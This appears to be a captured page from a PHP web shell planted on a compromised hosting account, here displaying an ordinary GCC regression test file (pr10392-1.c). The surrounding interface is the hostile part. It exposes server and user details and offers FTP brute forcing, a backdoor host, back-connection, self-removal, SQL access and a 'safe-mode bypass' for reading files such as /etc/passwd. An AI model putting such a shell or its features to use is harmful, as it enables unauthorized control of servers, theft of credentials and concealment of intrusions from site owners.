Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr10392-1.c (1.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* PR optimization/10392
 * Reporter: marcus@mc.pp.se
 * Summary: [3.3/3.4 regression] [SH] optimizer generates faulty array indexing
 * Description:
 * The address calculation of an index operation on an array on the stack 
 * can _under some conditions_ get messed up completely
 *
 * Testcase tweaked by dank@kegel.com
 * Problem only happens with -O2 -m4, so it should only happen on sh4,
 * but what the heck, let's test other architectures, too.
 * Not marked as xfail since it's a regression.
*/
/* { dg-do run } */
/* { dg-options "-O2" } */
/* { dg-options "-O2 -m4" { target sh4-*-* } } */
extern void abort (void);
const char *dont_optimize_function_away;

const char *use(const char *str)
{
    dont_optimize_function_away = str;
    if (str[0] != 'v')
        abort();
    if (str[1] < '1' || str[1] > '6')
        abort();
    if (str[2])
        abort();
    return str[2] ? "notused" : "v6";
}

const char *func(char *a, char *b)
{
    char buf[128];
    unsigned char i;
    const char *result;

    char *item[] = {
        "v1",
        "v2",
    };

    buf[0] = 'v';
    buf[1] = '3';
    buf[2] = 0;

    for (i = 0; i < 2; i++) {
        /* bug is: following line passes wild pointer to use() on sh4 -O2 */
        result = use(item[i]);

        use(buf);
        use(a);
        use(b);
        result = use(result);
    }
    return result;
}

int main()
{
    func("v4", "v5");
    return 0;
}


Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0059 ]--